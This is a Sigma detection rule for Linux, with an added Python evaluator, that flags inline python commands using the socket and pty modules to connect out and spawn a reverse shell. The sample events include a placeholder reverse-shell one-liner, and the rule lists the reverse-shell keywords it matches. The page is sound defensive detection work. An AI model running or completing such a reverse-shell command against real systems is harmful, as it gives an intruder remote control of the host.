Python Reverse Shell Execution Via PTY And Socket Modules

Detects the execution of python with calls to the socket and pty module in order to connect and spawn a potential reverse shell.

Sigma rule

```yaml
title: Python Reverse Shell Execution Via PTY And Socket Modules
id: 32e62bc7-3de0-4bb1-90af-532978fe42c0
related:
    - id: c4042d54-110d-45dd-a0e1-05c47822c937
      type: similar
status: test
description: |
        Detects the execution of python with calls to the socket and pty module in order to connect and spawn a potential reverse shell.
references:
    - https://www.revshells.com/
author: '@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)'
date: 2023-04-24
modified: 2024-11-04
tags:
    - attack.execution
logsource:
    category: process_creation
    product: linux
detection:
    selection:
        Image|contains: 'python'
        CommandLine|contains|all:
            - ' -c '
            - 'import'
            - 'pty'
            - 'socket'
            - 'spawn'
            - '.connect'
    condition: selection
falsepositives:
    - Unknown
level: high
```
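To see how the `selection` block behaves, here is an added example (not part of the Sigma project or this rule) that evaluates the same `Image|contains` / `CommandLine|contains|all` logic over a few constructed process_creation events, including benign ones that share some of the keywords; the `ProcessEvent` type and the sample events are assumptions for illustration.

```python
# Added example: minimal evaluator for this rule's `selection` over constructed
# process_creation events (not part of the Sigma project or this rule).
from dataclasses import dataclass

# Mirrors the rule's selection; Sigma string modifiers match case-insensitively.
IMAGE_CONTAINS = "python"
COMMANDLINE_CONTAINS_ALL = [" -c ", "import", "pty", "socket", "spawn", ".connect"]


@dataclass
class ProcessEvent:
    image: str
    command_line: str


def matches_rule(event: ProcessEvent) -> bool:
    """True when Image contains 'python' AND CommandLine contains every token."""
    image = event.image.lower()
    cmd = event.command_line.lower()
    if IMAGE_CONTAINS not in image:
        return False
    return all(token.lower() in cmd for token in COMMANDLINE_CONTAINS_ALL)


# Constructed sample events (illustrative, not real telemetry).
SAMPLE_EVENTS = [
    # Suspicious: inline python importing socket and pty to connect and spawn a shell.
    ProcessEvent("/usr/bin/python3",
                 "python3 -c 'import socket,pty; s=socket.socket(); "
                 "s.connect((HOST, PORT)); pty.spawn(SHELL)'"),
    # Benign: inline socket use without pty/spawn/.connect.
    ProcessEvent("/usr/bin/python3",
                 "python3 -c 'import socket; print(socket.gethostname())'"),
    # Benign: a script path, not ' -c ', even though keywords appear in the name.
    ProcessEvent("/usr/bin/python3", "python3 /opt/tools/pty_socket_spawn.py"),
    # Different interpreter: Image does not contain 'python', so no match.
    ProcessEvent("/usr/bin/perl", "perl -e 'use Socket; ...'"),
]


def alerts(events=SAMPLE_EVENTS) -> list[str]:
    """Command lines of the events that trigger the rule."""
    return [e.command_line for e in events if matches_rule(e)]


if __name__ == "__main__":
    for cmd in alerts():
        print("ALERT:", cmd)
```

Only the first sample event fires; the other three show that single keywords alone are not enough, since the rule requires all six substrings plus a python Image.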
